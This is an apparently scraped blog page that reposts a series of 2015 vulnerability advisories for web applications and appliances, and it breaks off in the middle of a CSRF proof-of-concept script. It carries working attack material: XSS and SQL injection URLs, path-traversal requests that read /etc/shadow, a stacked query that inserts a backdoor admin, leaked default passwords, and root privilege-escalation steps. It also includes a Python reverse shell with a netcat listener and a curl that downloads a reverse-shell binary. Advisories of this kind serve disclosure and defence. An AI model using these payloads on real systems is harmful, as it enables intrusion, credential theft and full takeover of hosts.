source: https://www.securityfocus.com/bid/54117/info
Adiscan LogAnalyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
LogAnalyzer 3.4.3 is vulnerable; other versions may also be vulnerable.
http://www.example.com/?search=Search&highlight="<script>alert(document.cookie)</script>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863148993
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NOVIUSOS0629.txt
Vendor:
=======================
community.novius-os.org
Product:
===============================================================
novius-os.5.0.1-elche is a PHP Based Content Management System
community.novius-os.org/developpers/download.html
Advisory Information:
===================================
Persistent XSS, LFI & Open Redirect
Vulnerability Details:
======================
Persistent XSS:
---------------
Users can inject XSS payloads that will be saved to MySQL DB, where they
will execute each time when accessed.
1- In Admin under 'Media Center' users can inject XSS payloads and save to
the 'media_title' field for a saved media file,
create a new media page inject payload click save and then select
visualize.
2- Under Website menus area users can inject XSS payloads and save for the
'menu_title' field for a Website menu.
If we view browser source code at
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview
the XSS is output to its HTML entities.
e.g.
<title><script>alert('HELL')</script></title>
But within the same webpage for <h1> tag you can see it is not.
e.g.
<div id="block-grid" class=" customisable col-md-12 col-sm-12 col-xs-12
main_wysiwyg"><h1 id="pagename"><script>alert('HELL')</script></h1>
Local File Inclusion:
---------------------
We can directory traverse access and read files outside of the current
working directory in the Admin area by abusing the 'tab' parameter.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../
Open Redirect:
--------------
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=
is open to abuse by supplying an malicious a location or file.
XSS Exploit code(s):
====================
In 'Media Center' create a new media file, click edit and inject XSS
payload for the 'title' field click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_media/media/insert_update/1
vulnerable parameter:
media_title
In 'Website Menu' create a new website menu item and inject XSS payload
click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_menu/menu/crud/insert_update%3Fcontext%3Dmain%253A%253Aen_GB
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview=1
vulnerable parameter:
menu_title
LFI:
----
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../SENSITIVE-FILE.txt
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php
Open Redirect:
--------------
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=http://www.SATANSBRONZEBABYSHOES.com
Disclosure Timeline:
======================================
Vendor Notification: NA
June 29, 2015 : Public Disclosure
Severity Level:
=================
Med
Description:
================================================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] novius-os.5.0.1-elche
Vulnerable Parameter(s): [+] media_title, menu_title, tab, redirect
Affected Area(s): [+] Login, Web Pages, Media Center & Website
Menu area
=================================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar,
provided that
due credit is given to the author. The author is not responsible for any
misuse of the
information contained herein and prohibits any malicious use of all
security related
information or exploits by the author or elsewhere.
(hyp3rlinx)
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Watchguard XCS Multiple Vulnerabilities
Affected versions: Watchguard XCS <=10.0
PDF:
http://www.security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf
+-----------+
|Description|
+-----------+
The Watchguard XCS virtual appliance contains a number of
vulnerabilities, including unauthenticated SQL injection, command
execution and privilege escalation. By combining these vulnerabilities,
an attacker may remotely obtain root privileges on the underlying host.
+------------+
|Exploitation|
+------------+
==SQL Injection==
Unauthenticated SQL injection is possible through the “sid” cookie
parameter in the Watchguard XCS web interface due to a PHP script that
insecurely constructs an SQL query using that value. Stacked queries are
possible, and allow insertion of a backdoor web interface user into the
database. The following POC shows the insertion of a backdoor user, and
a python snippet that can be used to construct the Watchguard XCS
specific password hashes.
[SQLi POC]
GET /borderpost/imp/compose.php3 HTTP/1.1
Host: [HOST]
Cookie: sid=1%3BINSERT INTO sds_users (self, login, password, org,
priv_level, quota, disk_usage) VALUES(99, 'backdoor',
'0b75e2443d3c813d91ac5b91106a70ad', 0, 'server_admin', 0, 0)--
[Python Password Hash Generator]
import hashlib
def gen_hash(pass_clear):
PRE_SALT = "BorderWare "
POST_SALT = " some other random (9) stuff"
t1 = hashlib.md5(PRE_SALT + pass_clear + POST_SALT).hexdigest()
t2 = hashlib.md5(pass_clear + t1).hexdigest()
return t2
print gen_hash("backdoor")
==Command Injection==
The web interface of XCS contains a command injection vulnerability,
allowing an authenticated web application user to execute system
commands as the "nobody" user. The vulnerability is in the id parameter
of the "mailqueue.spl" page.
[POC]
GET /ADMIN/mailqueue.spl?f=dnld&id=;id;uname%20-a
Host: [HOST]
Cookie: [VALID COOKIE]
==Privilege Escalation==
Privilege Escalation
There are multiple methods to escalate privileges to root after
obtaining a shell. The "FixCorruptMail" script exploit is shown below,
an additional method is detailed in the accompanying PDF. Privilege
escalation is possible by exploiting the /usr/local/bin/FixCorruptMail
script when it is called by root's crontab every three minutes. This
script reads a file “badqids” from the /var/tmp directory, and
constructs a shell command using some of the contents.
[POC]
touch /tmp/dummyfile
/usr/local/sbin/curl -s http://[REVERSE_SHELL.elf] -o /tmp/revshell
chmod +x /tmp/revshell
echo "../../../../../../tmp/dummyfile;/tmp/revshell" > /var/tmp/badqids
The executable "/tmp/revshell" will be executed within three minutes by
the root user.
+----------+
| Solution |
+----------+
Apply the relevant XCS security hotfix (Build 150522) as provided by
Watchguard.
+-------------------+
|Disclosure Timeline|
+-------------------+
12/05/2015 - Email sent to confirm vendor security contact address is valid.
13/05/2015 - Response from vendor confirming address is valid.
13/05/2015 - Sent advisory through to vendor.
13/05/2015 - Vendor confirms receipt of advisory.
27/05/2015 - Vendor sends update on fixes, states a release will be
published shortly.
09/06/2015 - Security hotfixes released for Watchguard XCS v10.0 and v9.2.
29/06/2015 - Public advisory release.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a
high level of technical expertise while creating long and lasting
professional relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
WedgeOS Multiple Vulnerabilities
Affected versions: WedgeOS <= 4.0.4
PDF:
http://www.security-assessment.com/files/documents/advisory/WedgeOS-Final.pdf
+-----------+
|Description|
+-----------+
Wedge Networks WedgeOS Virtual Appliance contains a number of security
vulnerabilities, including unauthenticated arbitrary file read as root,
command injection in the web interface, privilege escalation to root,
and command execution via the system update functionality.
+------------+
|Exploitation|
+------------+
==Unauthenticated Arbitrary File Read==
Any user with access to the web interface of WedgeOS may submit a GET
request to the ssgimages function, using directory traversal to specify
an arbitrary file on disk. The web server runs as root, so any file may
be read, including the shadow file. This vulnerability can be used to
read the contents of the local MySQL database, which contains MD5
password hashes for the web interface.
[POC]
curl -sk
'https://[HOST]/ssgmanager/ssgimages?name=../../../../../etc/shadow' |
head -n 1
root:$1$KVY2OJDj$Xg5LkGQI3lUvzr8GVIErp/:15828:0:99999:7:::
==Command Injection==
Any authenticated user may execute arbitrary commands as root. The ping,
nslookup, and traceroute functions of the diagnostic interface fail to
validate user input correctly, which allows the injection of arbitrary
system commands. Bash brace expansion can be used to execute more
syntactically complex commands.
[POC]
----
POST /ssgmanager/jsp/readaccess/ping.jsf HTTP/1.1
Host: [HOST]
Cookie: JSESSIONID=[SESSION];
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
mainform=mainform&mainform:input=1%26id&mainform:submitGo=Go&mainform:j_id_jsp_208968386_10pc4=&javax.faces.ViewState=j_id3
----
==Privilege Escalation==
A remote user with access to the 'support' account over SSH can escalate
privileges to root by using way of the admin account. The support
account can be accessed with the password "ous35hi3". This gives the
user a bash shell. If the support user knows the password for the admin
user, they can switch to the admin user and launch a bash shell.
Otherwise, the admin password can be reset by logging in with the
resetpassword user, or by accessing the local MySQL database and
cracking the admin hash. The database can be accessed with the "root"
user and password "wecandoit".
Once the user has the admin password, they can switch to the admin user
and spawn a bash shell by executing the following command:
su -s /bin/bash admin
With a bash shell as the admin user, there are multiple methods to
escalate to root. If the file at /var/tmp/secfi_update.sh does not
exist, this can be created and executed as root with sudo. However this
file is created when updating the system, so it may not be possible.
The admin user can also escalate privileges to root by creating a
specific directory path in any location where they have write access,
and exploiting environment variables when running the ctl_snort.sh
script via sudo.
[POC]
-Read admin password from DB-
ssh support@[HOST]
support@[HOST]'s password: [ous35hi3]
[support@wedgevm ~]$ mysql -u root --password=wecandoit ssgmanager -e
'select password from admin;'
+----------------------------------+
| password |
+----------------------------------+
| [PASSWORD] |
+----------------------------------+
-Reset admin password with support user-
ssh resetpassword@[HOST]
resetpassword@[HOST]'s password: [default!]
Reset password for admin (y/n)? y
Resetting admin password...
Admin password has been reset to default.
Connection to [HOST] closed.
-Privesc via environment variables and sudo-
[support@wedgevm ~]$ su -s /bin/bash admin
Password: [admin] (Default password)
[admin@wedgevm support]$ export GUARDIAN_HOME=/var/tmp
[admin@wedgevm support]$ mkdir -p /var/tmp/shared/script
[admin@wedgevm support]$ echo "id > /var/tmp/id" >
/var/tmp/shared/script/query_license.sh
[admin@wedgevm support]$ chmod +x /var/tmp/shared/script/query_license.sh
[admin@wedgevm support]$ sudo /usr/local/snort/bin/ctl_snort.sh start
-mode ids
Error: specify the snort configuration file with -config
[admin@wedgevm support]$ cat /var/tmp/id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[admin@wedgevm support]$
==Command Execution==
An admin user with write access to the web interface may execute
arbitrary commands as root. The user can specify an external server with
which to retrieve system updates. The WedgeOS requests a shell script
from the remote host and runs it as root. No validation of the script is
performed, so arbitrary commands may be specified.
[POC]
-Reverse Shell-
$cat secfi_update1.2.3.4.sh
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST]",1337));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-HTTP Post-
POST /ssgmanager/jsp/writeaccess/SystemUpdate.jsf HTTP/1.1
Host: [HOST]
Cookie: JSESSIONID=[SESSION]; JSESSIONIDSSO=[SESSION]
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
mainform=mainform&mainform%3Aid=1&mainform%3Apassword=1&mainform%3Aupdates=&mainform%3Aversion=1.2.3.4
&mainform%3AisDefaultServer=false&mainform%3AcustomServer=[HOST]%2F&mainform%3Asave=Run+Update&javax.faces.ViewState=j_id12
-HTTP Server and Listener-
$python -m SimpleHTTPServer 80 & netcat -vnlp 1337
[1] 24289
listening on [any] 1337 ...
Serving HTTP on 0.0.0.0 port 80 ...
[HOST] - - [18/Jun/2015 11:50:09] "GET /secfi_update1.2.3.4.sh HTTP/1.0"
200 -
connect to [HOST] from (UNKNOWN) [HOST] 53933
sh: no job control in this shell
sh-4.0# id
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+----------+
| Solution |
+----------+
Update to WedgeOS version 4.0.5-482 or greater.
+-------------------+
|Disclosure Timeline|
+-------------------+
16/03/2015 - Advisory sent to vendor.
20/03/2015 - Follow up email checking if vendor has received.
24/03/2015 - Advisory receipt acknowledged by vendor.
22/04/2015 - Email sent asking for update, email undeliverable due to
421 Timeout from vendor mail server.
28/04/2015 - Additional email sent asking for update.
28/04/2015 - Vendor response, states official response will be provided
shortly.
15/05/2015 - Email sent asking for update on official response, email
undeliverable.
20/05/2015 - Additional email sent asking for update on official
response, email undeliverable.
27/05/2015 - Called vendor, who stated a new release is being worked on
and an update will be provided soon.
03/06/2015 - Email from vendor stating a new version is being put together.
09/06/2015 - Email sent to vendor stating the advisory will be publicly
disclosed soon, email undeliverable.
12/06/2015 - Called vendor, who stated a new version will be released
shortly.
12/06/2015 - Email from vendor confirming imminent release of new version.
12/06/2015 - Vendor advises a fix is in place in the newly released
update of WedgeOS.
29/06/2015 - Advisory Release.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a
high level of technical expertise while creating long and lasting
professional relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "fileName" parameter of the "tail" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
Timeline:
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
Summary:
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "fileName" parameter of the "tail" action
Vulnerability:
Sample URL:
https://example.com:4434/csvn/log/tail?fileName=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&startIndex=0
Fix proposal:
Remove feature or santizes the fileName parameter so that no path traversals and
arbitrary file inclusions are possible.
Vendor fix:
[...] now allow only showing hooks/logs within the intended directories.
####################################################################
# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "listViewItem" parameter of the "index" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
Timeline:
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
Summary:
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "listViewItem" parameter of the "index"
action
Vulnerability:
Request:
POST /csvn/repo/index HTTP/1.1
Host: example.com:4434
[...]
id=1&datatable_length=10&listViewItem_../../../../../../etc/passwd=on&_confirmDialogText_copyHook=&_confirmDialogText_renameHook=&_action_downloadHook=Download
Response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-disposition: attachment;filename="../../../../../../etc/passwd"
Content-Length: 1825
root:x:0:0:root:/root:/bin/bash
Fix proposal:
Remove feature or santizes the "listViewItem" parameter so that no path traversals and
arbitrary file inclusions are possible.
Vendor fix:
[...] now allow only showing hooks/logs within the intended directories.
####################################################################
# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via "fileName" parameter of the show action
#
# Date: 10.10.2014
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
Timeline:
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
Summary:
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "fileName" parameter of the show action
Vulnerability:
Request:
GET /csvn/log/show?fileName=../../../../../../etc/shadow HTTP/1.1
Host: example.com:4434
Response:
HTTP/1.1 200 OK
[...]
<div class="span3">../../../../../../etc/passwd</div>
[...]
root:x:0:0:root:/root:/bin/bash
Fix proposal:
Remove feature or santizes the fileName parameter so that no path traversals and
arbitrary file inclusions are possible.
Vendor fix:
[...] now allow only showing hooks/logs within the intended directories.
####################################################################
# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "filename" parameter of the "downloadHook" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
Timeline:
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
Summary:
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "filename" parameter of the
"downloadHook" action
Vulnerability:
Example URL:
https://example.com:4434/csvn/repo/downloadHook/1?filename=../../../../../../etc/passwd
Fix proposal:
Remove feature or santizes the "filename" parameter so that no path traversals
and arbitrary file inclusions are possible.
Vendor fix:
[...] now allow only showing hooks/logs within the intended directories.
source: https://www.securityfocus.com/bid/54140/info
The 'com_szallasok' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_szallasok&mode=8&id=-25 union select 0,1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
source: https://www.securityfocus.com/bid/54147/info
Cotonti is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Cotonti 0.6.23 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?m=hits&f=year&v=1[SQLi]
source: https://www.securityfocus.com/bid/54150/info
CMS Lokomedia is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
CMS Lokomedia 1.5 is vulnerable; other versions may also be affected.
http://www.example.com/lokomedia/adminweb/media.php?module=berita&halaman=<script>alert(document.cookie);</script>
http://www.example.com/lokomedia/adminweb/media.php?module=agenda&halaman=<script>alert(document.cookie);</script>
http://www.example.com/lokomedia/adminweb/media.php?module=download&halaman=<script>alert(document.cookie);</script>
http://www.example.com/lokomedia/adminweb/media.php?module=templates&halaman=<script>alert(document.cookie);</script>
http://www.example.com/lokomedia/adminweb/media.php?module=galerifoto&halaman=<script>alert(document.cookie);
http://www.example.com/Lokomedia/adminweb/media.php?module=hubungi
# Exploit Title: Fiyo CMS multiple SQL vulnerability
# Date: 2015-06-28
# Exploit Author: cfreer (poc-lab)
# Vendor Homepage: http://www.fiyo.org/
# Software Link:
http://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip
# Version: 2.0_1.9.1
# Tested on: Apache/2.4.7 (Win32)
# CVE : CVE-2015-3934
1、
The vulnerable file is /apps/app_article/controller/rating.php, because the
rating.php includes jscore.php, so we must add referer in
HTTP Data Stream to bypass the limits of authority.when the 'do' equal
'rate' the vulnerable is same too.
require('../../../system/jscore.php');
if(!isset($_POST['id']))
header('../../../');
else {
$id = $_POST['id'];
$db = new FQuery();
$db->connect();
$qrs = $db->select(FDBPrefix.'article','*',"id=$id");
$qrs = $qrs[0];
POC:
HTTP Data Stream
POST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101
Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:80/fiyocms/
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;
PHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
do=getrate&id=182;select sleep(5) --
=====================================================================================================================================
2、
POC:
POST /fiyocms/user/login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101
Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;
PHPSESSID=4gl29hsns650jqj5toakt044h0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
user='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login
The vulnerable file is \apps\app_user\sys_user.php
if(isset($_POST['login'])) {
$_POST['user'] = strip_tags($_POST['user']);
$qr = $db->select(FDBPrefix."user","*","status=1 AND user='$_POST[user]'
AND password='".MD5($_POST['pass'])."'");
The parameter of user is vulnerable. strip_tags doesn't work, Still can be
bypass.
Title: Cross-Site Request Forgery (CSRF) Vulnerability in C2Box application Allows adding an Admin User or reset any user's password.
Author: Wissam Bashour - Help AG Middle East
Vendor: boxautomation(B.A.S)
Product: C2Box
Version: All versions below 4.0.0(r19171)
Tested Version: Version 4.0.0(r19171)
Severity: HIGH
CVE Reference: CVE-2015-4460
# About the Product:
B.A.S C2Box provides global solutions enabling full control and visibility over cash positions and managing domestic or cross border payment processes.
# Description:
This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an admin account into the application. This leads to compromising the whole domain as the application normally uses privileged domain account to perform administration tasks.
Also the attacker can reset any user's password after gaining the privileged account.
# Vulnerability Class:
Cross-Site Request Forgery (CSRF) - https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
# How to Reproduce: (POC):
Host the attached code in a webserver. Then send the link to the application Admin. The admin should be logged in when he clicks on the link.
You can entice him to do that by using social engineering techniques.
Say for example: Log into the application and click the following link to get free licenses
# Disclosure:
Discovered: June 10, 2015
Vendor Notification: June 10, 2015
Advisory Publication: June 27, 2015
Public Disclosure: June 27, 2015
# Solution:
Upgrade to the latest Build will fix this issue.
The new version number is 15.6.22
Release date: June 22, 2015
# credits:
Wissam Bashour
Associate Security Analyst
Help AG Middle East
# Proof of Concept Code:
https://raw.githubusercontent.com/Siros96/CSRF/master/PoC
https://www.dropbox.com/s/i45wzl6cqavrzm4/PoC_CSRF_password_reset.mp4?dl=0
#References:
[1] help AG middle East http://www.helpag.com/.
[2] http://www.boxautomation.com/.
[3] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
[4] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
----- Proof of concept ----
<html>
<!-- CSRF PoC - Wissam-->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://#thesite/SecuritySetting/UserSecurity/UserManagement.aspx", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------284963701632007118234117095");
xhr.withCredentials = true;
var body = "-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"__EVENTTARGET\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"__EVENTARGUMENT\"\r\n" +
"\r\n" +
"Content-Disposition: form-data; name=\"__VIEWSTATEENCRYPTED\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"__EVENTVALIDATION\"\r\n" +
"\r\n" +
"V0dFoNB2gzNOMIMLLx+05dEOodRjxb1IxsKxMr+ehPpXQ0dPvYTi/CNzoqOkFt0ZFBapLnziRwgnyQas/THRwIawzpqTC0Kr4vX9u+YW5L0t1xef4donRvhTIZYESWR1oeFn1Rwtox5X3e20bAUS4A==\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtUserName\"\r\n" +
"\r\n" +
"WISSAM\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtUserName$CVS\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtPassword\"\r\n" +
"\r\n" +
"wissamwissam\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtPassword$CVS\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtConfirm\"\r\n" +
"\r\n" +
"wissamwissam\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtConfirm$CVS\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtEmail\"\r\n" +
"\r\n" +
"wissam@blablabla.com\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtEmail$CVS\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$btnCreateUser\"\r\n" +
"\r\n" +
"Create User\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_ASPxPopupControl1WS\"\r\n" +
"\r\n" +
"0:0:-1:-10000:-10000:0:35:150:1:0:0:0\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_ppSaveLayoutWS\"\r\n" +
"\r\n" +
"0:0:-1:-10000:-10000:0:400:100:1:0:0:0\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$ppSaveLayout$txtLayoutName\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$ppSaveLayout$txtLayoutName$CVS\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_ppShowLayoutsWS\"\r\n" +
"\r\n" +
"0:0:-1:-10000:-10000:0:280:315:1:0:0:0\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$ppShowLayouts$lbxLayouts\"\r\n" +
"\r\n" +
"\r\n" +
